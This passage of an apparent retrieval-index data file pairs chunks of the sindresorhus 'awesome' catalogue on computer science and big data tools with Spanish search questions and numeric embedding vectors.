-0.18297, 0.04735, 0.07617, -0.07896, -0.09549, -0.18483, -0.01219, -0.02007, 0.06247, 0.14654, -0.17084, 0.00536, -0.05815, 0.0536, 0.07371, -0.0369, -0.15176, -0.04254, 0.06133, -0.01668, -0.03602, 0.00039, -0.05222, -0.02058, -0.0232, 0.01758, 0.10476, 0.01872, 0.0986, -0.11767, -0.11683, -0.08738, 0.02751, -0.00738, 0.04606, -0.09871, 0.06072, 0.05995, -0.06612, 0.02291, -0.05318, 0.0563, -0.03959, 0.00247, -0.01445, -0.02522, 0.05985, -0.01494, -0.08614, 0.06497, -0.05482, 0.03871, 0.07924, 0.06125, -0.13666, 0.00099, 0.1237, 0.03411, -0.07462, -0.01853, 0.00203, 0.05652, -0.0363, 0.12513, -0.00407, -0.04568, -0.02097, 0.05164, 0.02788, -0.00683, 0.01311, 0.03308, -0.03109, -0.06379, 0.08436, -0.0177, 0.01677, 0.01368, -0.06235, 0.03102, 0.01203, -0.03794, 0.09992, -0.04882, 0.00145, -0.08955, -0.09736, 0.0381, 0.05347, 0.0022, 0.03877, 0.01224, -0.01103, -0.07398, 0.00922, 0.03801, -0.05286, -0.02249, 0.06745, -0.05279, -0.09868, 0.01509, -0.0139, 0.04881, 0.01428, 0.0652, 0.0747, -0.05209, 0.0527, 0.04107, -0.06837, 0.00313, 0.08652, -0.00978, 0.07168, -0.04893, -0.00171, 0.04731, 0.04148, -0.08798, -0.07204, -0.01259, -0.01034, -0.04146, -0.11964, 0.14375, -0.12097, 0.04683, 0.04759, -0.05955, -0.00315, -0.0884, -0.0514, -0.01041, -0.04682, -0.07416, -0.00611, 0.00042, -0.00511, -0.01106, -0.0345, 0.02626, 0.07307, -0.00315, 0.03371, 0.03706, 0.03635, -0.02332, -0.02282, 0.04255, -0.01309, 0.04744, -0.03685, -0.03444, -0.03831, 0.04152, 0.03079, 0.01621, 0.0156, -0.04511, 0.04863, -0.00357, 0.06437, 0.08308, -0.00661, 0.04621, 0.02083, 0.03508, 0.05609, 0.04876, -0.01921, -0.04192, 0.03379, 0.08541, 0.03154, 0.01286, 0.02617, 0.00683, -0.03808, -0.02902, 0.04339, 0.01949, 0.07258, -0.05483, -0.00173, 0.06085, -0.03027, 0.00461, 0.033, 0.01503, -0.0366, -0.05447, -0.08503, 0.02571, 0.03805, -0.00583, -0.03462, 0.03272, -0.00057, -0.0363, -0.00906, -0.05469, -0.04599, -0.01298, 0.01723, 0.05494, -0.04643, 0.06531, -0.06209]} -{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: University Courses. Data Science. Tutorials. Machine Learning. Tutorials. ML with Ruby β€” Learning, implementing, and applying Machine Learning using Ruby. Core ML Models β€” Models for Apple's machine learning framework. H2O β€” Open source distributed machine learning platform written in Java with APIs in R, Python, and Scala. Software Engineering for Machine Learning β€” From experiment to production-level machine learning. AI in Finance β€” Solving problems in finance with machine learning. JAX β€” Automatic differentiation and XLA compilation brought together for high-performance machine learning research. XAI β€” Providing insight, explanations, and interpretability to machine learning methods. Speech and Natural Language Processing. Spanish. NLP with Ruby. Question Answering β€” The science of asking and answering in natural language with a machine. Natural Language Generation β€” Generation of text used in data-to-text, conversational agents, and narrative generation applications. Linguistics. Cryptography.", "indexar": "cual es una alternativa libre a H2O para hacer aprendizaje automΓ‘tico?", "v": [0.02005, 0.11681, -0.13699, -0.02864, -0.15144, -0.0352, -0.07427, -0.0293, -0.22304, 0.02219, -0.11188, -0.19595, 0.01785, 0.05947, 0.11687, -0.02831, 0.09968, -0.1298, -0.04095, 0.08611, -0.06661, 0.05746, -0.09456, 0.01025, 0.00639, -0.11781, 0.03392, 0.14062, -0.21461, 0.04728, 0.07343, 0.10133, 0.04483, -0.04087, -0.10962, 0.09772, 0.07539, 0.07318, 0.07288, 0.02035, 0.01281, 0.0424, -0.00577, 0.08482, -0.00921, -0.00498, 0.02502, 0.05778, -0.04752, 0.02991, 0.08376, -0.00654, 0.02846, -0.06751, 0.08652, -0.00484, 0.14283, -0.04049, -0.0442, -0.21122, 0.02254, -0.01236, 0.0506, -0.0266, -0.02799, -0.01509, 0.01359, 0.09879, -0.05028, 0.11765, 0.03256, -0.02419, 0.07533, -0.05125, -0.0571, 0.09123, -0.04505, -0.03385, 0.0533, -0.04662, 0.02101, -0.07042, 0.00219, -0.00457, 0.05478, 0.03937, -0.00152, -0.10976, 0.06543, 0.03496, -0.02265, 0.0919, -0.0291, 0.05383, -0.00136, -0.09224, 0.00088, -0.01516, 0.02268, 0.0699, 0.03961, -0.02933, -0.05729, 0.02112, 0.00298, 0.02427, -0.00848, 0.03765, -0.13392, 0.04647, 0.04655, 0.05921, -0.02383, 0.01047, 0.03345, 0.025, 0.00293, 0.12839, 0.00801, 0.0317, -0.03033, 0.0435, -0.03866, -0.1151, 0.01482, 0.02619, 0.05512, 0.02647, -0.0055, 0.04571, 0.09624, -0.03022, -0.01793, -0.08661, -0.06734, -0.01209, 0.04359, -0.00057, -0.11004, -0.02489, -0.01235, 0.05897, -0.01388, -0.07795, 0.07106, -0.05084, 0.11449, -0.05142, 0.02319, -0.00186, -0.16422, -0.04175, 0.02632, 0.06195, -0.02195, -0.05455, -0.06854, -0.02546, -0.00955, 0.06291, 0.03968, 0.03953, 0.08594, 0.04072, -0.00889, -0.00086, -0.05659, -0.05069, -0.06489, -0.01475, -0.05192, 0.04665, 0.04446, -0.06901, 0.02242, -0.07037, 0.03056, -0.08273, -0.0017, -0.0233, 0.00527, 0.03476, -0.10282, -0.00857, 0.03564, -0.07138, 0.0194, -0.043, 0.0498, 0.06998, -0.05939, 0.0175, -0.06529, -0.11476, 0.03998, -0.00156, 0.0506, -0.01056, 0.00988, -0.05276, -0.06839, 0.01405, -0.02847, -0.01823, -0.05395, 0.00667, 0.02193, 0.04432, 0.04262, 0.0166, 0.03284, -0.00122, 0.14514, 0.00086, -0.05128, 0.0184, -0.05994, -0.00137, 0.03562, -0.00251, 0.02859, 0.02199, 0.00336, -0.01826, -0.03167, 0.06095, -0.01694, 0.11356, -0.05629, 0.0064, -0.03686, 0.02106, 0.00945, -0.04515, 0.05031, 0.00676, -0.02318, 0.02435, -0.05044, -0.05381, 0.0719, 0.00241, -0.00395, -0.01712, -0.03316, -0.03046, -0.0809, 0.02365, -0.02107, -0.05807, -0.0585, 0.02684, 0.00299, -0.00628, 0.00814, 0.02995]} -{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Papers β€” Theory basics for using cryptography by non-cryptographers. Computer Vision. Deep Learning β€” Neural networks. TensorFlow β€” Library for machine intelligence. TensorFlow.js β€” WebGL-accelerated machine learning JavaScript library for training and deploying models. TensorFlow Lite β€” Framework that optimizes TensorFlow models for on-device machine learning. Papers β€” The most cited deep learning papers. Education. Deep Vision. Open Source Society University. Functional Programming. Empirical Software Engineering β€” Evidence-based research on software systems. Static Analysis & Code Quality. Information Retrieval β€” Learn to develop your own search engine. Quantum Computing β€” Computing that utilizes quantum mechanics and qubits on quantum computers. Theoretical Computer Science β€” The interplay of computer science and pure mathematics, distinguished by its emphasis on mathematical rigour and technique. Conversational AI β€” Build awesome chatbots and digital assistants.", "indexar": "que programa puedo usar para construir modelos de aprendizaje automΓ‘tico en el navegador", "v": [0.03569, 0.05648, -0.20224, -0.26909, -0.07763, -0.01471, -0.01336, -0.01427, -0.16155, -0.1452, -0.11254, -0.09858, -0.02015, -0.03083, -0.05751, -0.01213, 0.09156, -0.17144, -0.04027, 0.06514, 0.04568, -0.03961, -0.01347, -0.02787, 0.09264, 0.10835, 0.00068, -0.02481, -0.04733, 0.04811, -0.03779, 0.11118, 0.15344, -0.075, -0.08709, -0.02318, 0.0419, -0.05545, -0.03339, -0.01413, 0.06414, 0.05667, -0.08623, 0.04507, 0.06708, 0.1161, 0.07428, -0.06325, -0.13664, -0.06211, 0.05513, 0.04043, -0.0215, 0.02133, 0.03575, -0.03402, 0.16178, -0.1198, -0.00843, -0.0991, 0.027, 0.00267, 0.00903, 0.03219, 0.00011, -0.07683, 0.03934, 0.10574, -0.08482, -0.00365, 0.04243, -0.04596, 0.05485, -0.059, 0.05812, 0.08552, -0.04397, -0.03284, 0.08111, -0.03246, 0.01841, -0.04616, -0.10007, 0.00815, 0.01466, 0.0582, -0.0252, -0.04379, 0.07775, -0.04272, -0.03178, 0.13154, -0.02625, 0.01677, 0.0033, -0.09111, 0.13044, -0.02634, 0.10012, 0.0295, -0.00886, -0.1263, 0.05133, 0.13478, 0.01028, 0.05183, 0.08816, -0.06954, -0.03115, -0.00024, 0.04635, 0.00023, -0.11689, -0.11516, 0.00327, 0.06681, 0.01482, 0.01123, -0.03487, -0.10009, -0.05244, 0.06883, -0.09421, -0.05599, 0.0577, 0.00222, 0.01849, 0.08665, -0.01486, 0.02536, 0.02978, -0.01299, -0.00302, -0.02589, -0.05745, 0.01775, -0.05302, 0.01333, -0.05138, -0.08833, 0.04292, 0.02012, -0.0241, -0.06296, -0.02257, -0.05089, 0.04135, -0.07542, 0.02002, -0.05926, -0.00841, 0.00824, 0.06683, -0.02384, -0.08482, -0.05285, 0.0181, -0.03286, 0.02009, 0.06794, -0.04622, 0.09526, 0.06709, 0.02295, 0.09642, -0.06037, -0.06246, 0.01806, 0.07946, 0.05428, 0.05962, 0.08284, 0.06177, -0.08237, -0.00662, 0.01353, -0.03552, -0.05639, -0.03382, -0.03416, -0.06802, 0.0098, -0.06647, -0.00041, -0.01621, -0.0822, -0.02976, 0.01245, -0.00319, 0.03338, -0.05854, 0.06437, -0.00636, -0.02896, 0.0931, 0.02721, 0.00839, 0.03463, 0.03409, -0.08265, -0.05342, 0.04203, 0.00831, -0.06164, 0.04076, 0.06626, -0.00499, 0.014, 0.06219, 0.0781, 0.03309, -0.05021, 0.09248, -0.00547, 0.02548, -0.01371, -0.02176, 0.00056, 0.02037, -0.01939, -0.01059, 0.00936, 0.0285, 0.03823, 0.02242, -0.03076, 0.0108, 0.05137, -0.01931, 0.00754, -0.02795, 0.00101, -0.06318, -0.04472, 0.04388, -0.00021, 0.00546, 0.01941, -0.07148, -0.03775, -0.00616, 0.07292, 0.02698, -0.02253, -0.00935, -0.07245, -0.04618, 0.01923, 0.02729, -0.03692, -0.04181, 0.06595, 0.02415, -0.07789, -0.01682, 0.06236]} -{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Papers β€” Theory basics for using cryptography by non-cryptographers. Computer Vision. Deep Learning β€” Neural networks. TensorFlow β€” Library for machine intelligence. TensorFlow.js β€” WebGL-accelerated machine learning JavaScript library for training and deploying models. TensorFlow Lite β€” Framework that optimizes TensorFlow models for on-device machine learning. Papers β€” The most cited deep learning papers. Education. Deep Vision. Open Source Society University. Functional Programming. Empirical Software Engineering β€” Evidence-based research on software systems. Static Analysis & Code Quality. Information Retrieval β€” Learn to develop your own search engine. Quantum Computing β€” Computing that utilizes quantum mechanics and qubits on quantum computers. Theoretical Computer Science β€” The interplay of computer science and pure mathematics, distinguished by its emphasis on mathematical rigour and technique. Conversational AI β€” Build awesome chatbots and digital assistants.", "indexar": "quΓ© herramienta me sirve para entrenar redes neuronales optimizadas para dispositivos mΓ³viles", "v": [0.08028, 0.01357, -0.11835, -0.23039, 0.02522, -0.00801, -0.23042, 0.00187, -0.0397, -0.11714, -0.08039, -0.07401, 0.038, -0.11493, 0.01377, 0.04805, 0.04178, -0.07175, 0.08369, 0.06763, -0.11156, -0.06749, -0.1087, 0.02149, 0.00987, 0.07317, 0.04003, 0.088, -0.21845, 0.002, -0.1291, 0.01861, 0.10218, -0.10438, -0.11453, 0.0384, -0.07509, 0.07331, -0.05159, -0.01208, -0.12024, 0.11319, -0.11694, -0.02448, 0.1561, 0.07185, -0.02762, -0.11808, -0.00391, 0.03732, 0.02484, 0.00991, 0.01981, -0.10391, -0.06865, -0.06132, 0.14515, -0.16036, 0.00849, -0.13708, -0.00852, -0.11579, -0.02471, -0.04475, 0.02135, -0.00617, 0.04087, 0.06949, -0.13176, 0.02308, 0.0285, 0.0705, 0.01306, 0.01792, 0.00011, 0.13549, -0.04633, 0.03684, 0.10887, -0.0103, 0.04056, -0.06059, -0.0896, 0.02852, -0.03259, 0.07286, 0.079, -0.01573, -0.03264, -0.06695, -0.02095, 0.0154, -0.06473, -0.07853, -0.03208, 0.03106, 0.02556, 0.00874, 0.03968, 0.0115, 0.05367, -0.03441, -0.0615, 0.0623, -0.10403, -0.00107, -0.01453, -0.0085, -0.03158, -0.06847, 0.06673, -0.03043, -0.02772, 0.04916, -0.03993, 0.03733, 0.02173, -0.02463, 0.05896, -0.03147, 0.02383, 0.01192, 0.02021, -0.01907, -0.00865, 0.04813, -0.03008, 0.09612, 0.11131, -0.02216, 0.10033, -0.06658, -0.03616, -0.00494, -0.0749, 0.01005, 0.00371, -0.05492, -0.07092, -0.04746, 0.01032, -0.0233, -0.06053, -0.07664, -0.03039, 0.07944, 0.05845, -0.04659, -0.01637, 0.02486, 0.07637, -0.05785, 0.00768, -0.04195, -0.08299, 0.04, -0.05311, -0.04351, -0.07854, 0.06621, -0.0708, -0.01503, 0.0356, 0.00467, -0.0165, -0.04457, -0.00464, 0.09045, 0.06857, 0.10143, -0.00788, 0.00255, 0.03142, -0.02391, -0.00953, 0.02266, -0.00577, 0.09318, 0.01666, -0.03662, -0.00216, 0.02489, 0.02636, -0.04516, 0.00041, -0.01008, -0.00835, 0.01793, -0.02349, 0.00905, -0.09232, 0.01934, 0.05425, -0.01703, 0.15736, -0.08691, -0.07464, -0.01136, 0.02849, 0.02481, -0.04257, -4e-05, -0.00131, 0.01286, 0.02255, 0.04328, 0.01375, -0.04981, -0.00813, 0.06398, -0.01502, -0.03687, 0.0231, -0.00746, -0.04389, -0.0029, -0.00239, 0.0625, -0.01967, -0.01647, 0.05356, 0.00953, 0.00742, 0.05196, -0.0703, 0.09195, -0.05263, 0.00748, -0.02773, -0.08241, 0.03034, -0.06888, -0.03493, -0.00169, -0.01536, -0.02241, 0.02526, -0.03386, 0.00147, 0.00604, -0.02914, 0.01165, -0.01657, 0.03767, -0.0275, -0.04781, -0.01706, -0.03313, -0.02928, -0.07809, -0.03449, -0.01685, 0.09961, -0.02088, 0.01823, -0.00926]} -{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Papers β€” Theory basics for using cryptography by non-cryptographers. Computer Vision. Deep Learning β€” Neural networks. TensorFlow β€” Library for machine intelligence. TensorFlow.js β€” WebGL-accelerated machine learning JavaScript library for training and deploying models. TensorFlow Lite β€” Framework that optimizes TensorFlow models for on-device machine learning. Papers β€” The most cited deep learning papers. Education. Deep Vision. Open Source Society University. Functional Programming. Empirical Software Engineering β€” Evidence-based research on software systems. Static Analysis & Code Quality. Information Retrieval β€” Learn to develop your own search engine. Quantum Computing β€” Computing that utilizes quantum mechanics and qubits on quantum computers. Theoretical Computer Science β€” The interplay of computer science and pure mathematics, distinguished by its emphasis on mathematical rigour and technique. Conversational AI β€” Build awesome chatbots and digital assistants.", "indexar": "con quΓ© puedo desarrollar asistentes virtuales y bots conversacionales", "v": [0.0229, 0.1328, -0.10112, -0.05818, -0.02249, -0.05263, 0.07353, -0.14022, 0.09392, -0.22972, -0.11421, -0.09703, -0.04584, 0.07545, 0.05207, 0.10246, 0.17644, 0.05798, 0.00445, 0.05844, 0.10415, -0.0726, -0.0734, 0.04937, 0.04601, 0.00989, 0.03092, 0.03194, 0.09538, 0.07125, 0.04896, -0.0359, -0.01598, 0.06356, 0.02775, -0.11979, -0.06413, 0.08018, 0.02962, 0.057, -0.01977, 0.12998, -0.07348, -0.06557, 0.14373, -0.03473, -0.10023, -0.08663, -0.03445, -0.023, -0.11808, -0.05543, -0.05232, 0.02487, 0.03143, -0.0384, 0.13489, -0.16437, 0.12483, -0.04444, -0.12503, 0.01172, 0.07443, 0.01016, 0.11059, -0.06854, 0.09317, -0.00109, -0.13689, 0.09706, -0.10209, -0.01159, -0.02263, 0.01225, 0.11322, 0.08389, -0.12711, 0.09545, -0.03657, 0.07432, 0.03748, -0.05412, 0.01086, 0.10234, 0.00041, -0.01939, -0.01578, -0.0098, -0.02025, 0.00602, 0.06431, 0.08729, 0.03584, -0.11128, 0.0043, -0.03243, 0.04289, 0.0222, -0.05232, 0.07372, 0.00872, 0.06215, -0.0201, 0.0535, -0.09598, 0.0324, 0.03791, -0.08739, 0.02863, -0.06704, 0.05285, 0.06359, -0.04018, 0.03383, 0.065, 0.01216, -0.00342, 0.04097, 0.09894, -0.03226, 0.02337, 0.04373, 0.00236, -0.05691, -0.04221, 0.01926, -0.05347, 0.10051, 0.01095, -0.00784, 0.00727, 0.01958, -0.0132, -0.14487, 0.01892, 0.03568, 0.10758, 0.01865, -0.00163, -0.0104, -0.06371, 0.02585, -0.02029, -0.1, 0.04809, 0.00025, -0.01149, -0.10401, -0.04714, 0.01959, 0.11544, -0.00776, 0.06887, 0.11048, -0.08354, -0.01868, -0.10843, -0.04343, -0.01719, 0.07432, 0.01561, 0.04784, 0.0516, -0.01942, 0.00998, -0.01023, -0.02027, 0.01019, -0.0233, 0.05537, -0.04046, -1e-05, -0.01756, -0.05996, -0.01782, 0.07849, -0.01011, -0.02722, -0.0107, -0.12684, -0.05767, -0.0373, -0.05975, -0.09415, -0.00604, -0.05537, -0.04426, -0.00865, 0.0035, 0.01765, -0.05159, 0.00284, -0.03726, 0.02187, 0.0113, -0.06573, -0.05192, -0.02685, -0.03512, -0.0666, -0.03201, 0.01234, 0.01477, -0.00261, 0.01726, 0.07733, -0.00191, -0.02754, -0.01713, 0.02636, 0.03532, -0.00698, 0.01059, -0.04185, -0.04553, -0.0023, -0.00435, -0.01879, 0.00334, 0.00667, 0.02571, 0.01685, 0.03123, 0.03574, 0.06427, 0.07209, 0.03663, 0.07448, 0.03038, 0.00187, -0.04728, -0.03256, 0.02655, -0.02836, 0.01199, 0.04034, 0.02311, 0.01346, -0.05461, 0.00055, 0.01511, 0.07859, -0.02466, -0.05936, 0.02027, -0.0216, -0.12482, 0.05572, -0.04882, -0.06016, -0.03784, 0.02581, 0.01933, -0.06629, -0.01294, 0.01996]} -{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Generative AI β€” Automatically generates a wide range of unique content in text, image, and audio format. Position-Based Quantum Cryptography β€” Theory on quantum cryptography that utilizes special relativistic constraints to achieve quantum-security under certain conditions.", "indexar": "que herramienta genera contenido ΓΊnico en texto e imagen y audio?", "v": [-0.07053, 0.06234, -0.05015, -0.18314, 0.03841, -0.10622, -0.17717, -0.04709, 0.01832, -0.09407, -0.11282, -0.07768, -0.10284, 0.03748, 0.03887, 0.02898, 0.15664, -0.09213, 0.01685, -0.00771, 0.04093, -0.03062, -0.1325, -0.06177, -0.06491, -0.09411, -0.0186, -0.0089, -0.05955, 0.11435, 0.0448, 0.09196, 0.12338, -0.14139, -0.196, -0.06535, 0.00024, 0.0984, -0.07912, 0.11397, -0.00174, 0.06106, -0.04096, 0.06826, -0.07823, -0.03455, 0.0111, 0.0642, -0.0199, 0.05803, 0.04664, -0.08402, -0.09557, 0.01271, -0.04854, -0.13626, 0.27532, -0.12116, -0.031, -0.10781, 0.01108, 0.08997, -0.08525, -0.0974, -0.04523, 0.12387, 0.03784, -0.0327, -0.03077, 0.06841, -0.01854, -0.01679, 0.097, -0.02263, 0.05132, 0.02282, -0.09808, -0.06179, -0.06903, 0.01379, 0.07626, -0.07208, -0.08532, 0.01895, -0.09973, -0.06717, 0.06742, -0.00163, 0.01595, -0.10781, -0.0432, 0.02177, 0.08965, 0.00779, -0.0438, -0.02093, 0.04717, -0.13497, 0.00491, 0.00966, 0.05778, -0.02645, -0.03766, -0.01653, 0.07358, -0.00268, -0.02852, -0.13186, -0.05086, -0.04592, 0.04147, 0.00175, 0.01199, 0.01121, -0.06117, 0.00041, 0.03867, -0.05172, 0.04784, -0.06929, 0.00011, 0.05227, -0.05451, -0.02716, -0.01326, 0.0065, -0.01953, 0.01041, -0.02143, -0.08152, -0.01061, -0.00417, -0.04136, -0.10739, -0.02091, -0.06611, 0.02283, -0.02877, -0.02758, -0.00455, -0.05849, 0.07223, -0.04557, -0.06357, 0.01587, 0.03906, 0.00147, -0.10282, -0.01491, 0.03937, -0.02456, -0.0488, -0.02854, -0.05883, -0.03214, 0.06467, -0.03583, 0.01342, -0.03874, -0.01703, -0.0661, -0.04608, 0.07877, 0.02724, 0.00597, -0.05764, -0.09942, -0.04239, 0.0472, -0.04313, -0.03153, -0.06776, 0.03337, -0.05564, -0.05108, -0.01672, -0.08118, -0.02659, -0.00209, -0.00559, -0.05147, -0.02895, -0.01005, -0.02678, 0.03583, -0.0404, -0.01445, -0.05496, -0.04349, -0.01205, -0.05476, 0.01664, -0.0153, -0.01658, 0.06951, 0.01904, -0.09777, -0.01772, 0.02518, 0.02668, -0.08568, -0.04968, 0.04958, -0.05654, 0.03155, 0.02363, -0.0384, 0.02552, -0.03185, 0.03136, 0.02419, 0.05595, -0.02184, 0.01435, -0.04158, 0.03121, -0.00305, 0.04422, -0.05807, 0.06801, 0.04959, 0.05409, 0.08462, -0.01195, 0.03471, 0.02965, -0.02592, 0.02738, 0.04998, -0.03251, 0.06183, 0.02021, -0.02805, -0.00392, 0.04598, -0.00715, -0.00082, 0.00039, -0.0718, -0.0941, 0.00059, -0.00597, -0.02445, 0.01857, -0.02739, -0.06343, -0.05922, 0.03051, -0.00035, -0.08672, -0.04129, -0.01879, 0.05503, -0.05702, 0.05305, -0.06919]} -{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Generative AI β€” Automatically generates a wide range of unique content in text, image, and audio format. Position-Based Quantum Cryptography β€” Theory on quantum cryptography that utilizes special relativistic constraints to achieve quantum-security under certain conditions.", "indexar": "existe alguna tΓ©cnica de criptografΓ­a cuΓ‘ntica basada en la posiciΓ³n que pueda utilizar?", "v": [-0.14297, 0.03197, -0.1681, -0.0891, 0.10864, -0.30239, 0.02809, 0.03085, -0.03215, -0.04745, -0.00539, -0.04904, 0.03528, 0.10639, 0.12561, -0.10326, 0.03139, -0.18055, 0.07325, -0.0915, -0.08946, -0.14345, -0.07737, -0.02177, -0.04089, -0.03668, -0.01932, -0.05954, -0.14339, 0.07392, 0.05677, 0.1194, -0.00142, 0.00573, -0.0596, -0.05618, -0.01013, -0.13029, 0.01551, 0.1124, -0.10961, -0.07043, 0.03776, 0.01316, 0.01417, 0.03748, -0.10675, 0.08688, -0.08195, 0.02483, 0.03897, -0.02098, -0.0875, -0.00396, -0.00383, -0.09325, 0.16271, -0.06117, 0.01753, -0.02788, -0.00344, 0.08526, -0.03835, 0.04255, 0.03978, -0.02429, -0.05972, -0.02626, -0.10627, -0.00776, 0.09305, 0.03439, -0.06282, 0.03566, 0.03851, 0.04569, -0.07683, 0.11095, 0.0143, 0.03692, -0.01206, 0.01136, -0.10267, -0.03313, -0.2169, -0.03306, 0.04169, 0.00971, -0.03929, -0.12934, 0.03476, 0.00088, -0.00618, -0.02844, 0.0751, 0.00508, -0.08012, 0.01658, -0.01685, -0.00706, 0.13393, 0.02284, -0.03399, 0.02024, 0.08114, 0.06007, 0.0274, -0.06577, 0.00254, -0.11084, -0.06095, 0.09056, -0.15399, -0.03145, -0.09663, -0.07738, 0.02705, -0.02494, -0.00888, -0.03615, 0.01777, 0.00903, -0.01692, -0.03101, -0.03814, 0.01798, -0.08238, 0.07454, -0.01048, -0.00121, -0.05918, -0.0516, -0.11356, -0.02396, -0.04769, 0.05169, 0.04549, -0.04972, -0.01136, -0.03153, 0.01001, 0.07999, -0.08706, -0.05314, 0.0199, 0.01921, 0.06232, -0.08126, -0.10564, -0.08023, -0.03835, -0.01598, 0.00925, 0.10781, 0.02241, -0.01462, 0.03737, -0.07011, -0.01647, 0.06063, 0.01636, -0.01638, -0.02775, 0.01713, -0.0444, -0.04922, -0.05588, -0.01388, -0.01538, 0.04292, 0.01107, 0.05883, 0.03244, -0.06409, 0.03057, -0.03251, 0.00767, -0.00908, -0.05042, -0.09766, 0.03479, -0.0209, 0.03885, -0.00424, 0.08819, 0.0069, -0.00114, -0.00761, -0.00446, -0.03275, -0.00555, -0.04992, -0.07469, 0.06536, -0.03779, -0.03824, 0.03492, 0.03225, 0.03365, -0.00479, -0.03367, 0.01977, -0.03429, 0.02157, -0.01637, 0.04465, -0.01107, -0.01055, -0.02618, -0.01628, 0.01548, -0.05912, -0.00294, -0.05759, -0.03518, -0.05566, 0.01893, -0.01842, -0.01622, -0.03155, -0.03261, 0.03252, 0.06181, -0.00476, -0.01433, -0.04491, 0.03024, 0.01842, 0.00134, 0.02145, -0.0101, 0.0788, -0.02383, 0.0206, 0.06148, 0.02884, -0.00704, -0.05853, 0.03958, -0.06212, -0.01102, 0.05587, -0.00808, -0.06177, -0.02222, -0.05879, -0.0937, -0.00331, -0.00139, -0.03427, 0.03462, 0.05406, 0.05843, -0.03809, 0.02602, -0.01676]} -{"tipo": "pregunta", "herramienta": "Big Data", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Big Data", "tema": "big data", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Big Data: Big Data. Public Datasets. Hadoop β€” Framework for distributed storage and processing of very large data sets. Data Engineering. Streaming. Apache Spark β€” Unified engine for large-scale data processing. Qlik β€” Business intelligence platform for data visualization, analytics, and reporting apps. Splunk β€” Platform for searching, monitoring, and analyzing structured and unstructured machine-generated big data in real time. Network Analysis.", "indexar": "quΓ© herramienta sirve para procesar conjuntos de datos muy grandes distribuidos?", "v": [0.1515, 0.03827, -0.17028, -0.17383, 0.06467, -0.1012, 0.06938, -0.08681, -0.10487, -0.1071, -0.06285, -0.05576, -0.07805, -0.14363, 0.03822, -0.01677, 0.0953, -0.14916, -0.02957, -0.03652, 0.02558, -0.05302, -0.05246, -0.14855, -0.12393, -0.0556, 0.07983, -0.01216, -0.19231, 0.11463, 0.05951, 0.02635, 0.01354, -0.1081, -0.07181, -0.05302, -0.10705, 0.11327, -0.04477, -0.05861, 0.02999, 0.03232, -0.10906, -0.03774, 0.04225, 0.01205, -0.13708, -0.01609, -0.02253, -0.05716, -0.06702, 0.01529, -0.08866, 0.02707, -0.03507, -0.15502, 0.11985, -0.09835, 0.08552, -0.04885, -0.07805, 0.03585, 0.03107, -0.03739, -0.03767, -0.04829, -0.07288, -0.04314, -0.05432, 0.05446, -0.09077, 0.14224, 0.06029, -0.03738, 0.05616, 0.00848, 0.05038, 0.1018, 0.01248, 0.00619, 0.08166, 0.00258, -0.04429, -0.06272, -0.00212, -0.0576, 0.08616, -0.06659, -0.00697, -0.07271, 0.03317, 0.03641, -0.05046, -0.01615, 0.07048, 0.0486, 0.10378, -0.05801, -0.02779, 0.02009, 0.12562, -0.00444, -0.14994, 0.08533, -0.03782, 0.10171, -0.00194, 0.01384, -0.0741, -0.08385, -0.00515, -0.0217, 0.02808, -0.02682, 0.02452, 0.01283, -0.01079, -0.05028, -0.06177, -0.01846, 0.07168, 0.00505, -0.02007, -0.02921, -0.01646, -0.04956, -0.00708, 0.09098, -0.00717, 0.01697, -0.05253, -0.0338, -0.09414, 0.02894, 0.01067, -0.01091, 0.00302, -0.12152, 0.04161, -0.07596, 0.0593, 0.03363, -0.07698, -0.03816, 0.05094, -0.01455, 0.1227, 0.01616, -0.01713, -0.02238, 0.04277, -0.00855, 0.00629, 0.01156, -0.06141, -0.01063, -0.03317, -0.05992, -0.09718, -0.00911, -0.03304, 0.05343, -0.01197, 0.05538, 0.07397, -0.03043, 0.07195, 0.03546, 0.09597, 0.05797, 0.05478, -0.02212, 0.06351, -0.07112, -0.01637, -0.02575, -0.11928, -0.0525, -0.04052, -0.06374, -0.01734, -0.0238, -0.0364, -0.0318, 0.00113, 0.01504, -0.02255, -0.06785, 0.0056, 0.03688, 0.02458, 0.11268, 0.05461, -0.1008, 0.0584, -0.02786, -0.06721, -0.0469, 0.06873, -0.02935, -0.03338, 0.06501, -0.04657, 0.00974, -0.01851, 0.09624, -0.03707, -0.00373, 0.0145, 0.0222, 0.00109, -0.01292, 0.04264, -0.02675, -0.06496, -0.03531, 0.05014, 0.02624, -0.01619, 0.02012, -0.02667, 0.02915, 0.07147, -0.01879, 0.00413, 0.02121, 0.06228, -0.024, 0.04163, -0.01859, 0.00164, -0.00449, 0.01731, 0.01389, 0.03328, -0.03266, -0.02628, -0.02979, -0.06028, -0.03447, -0.00219, 0.05047, -0.03769, -0.00195, 0.01053, -0.05159, -0.06907, -0.01606, -0.00397, -0.08141, -0.07651, -0.01773, 0.03979, -0.03824, 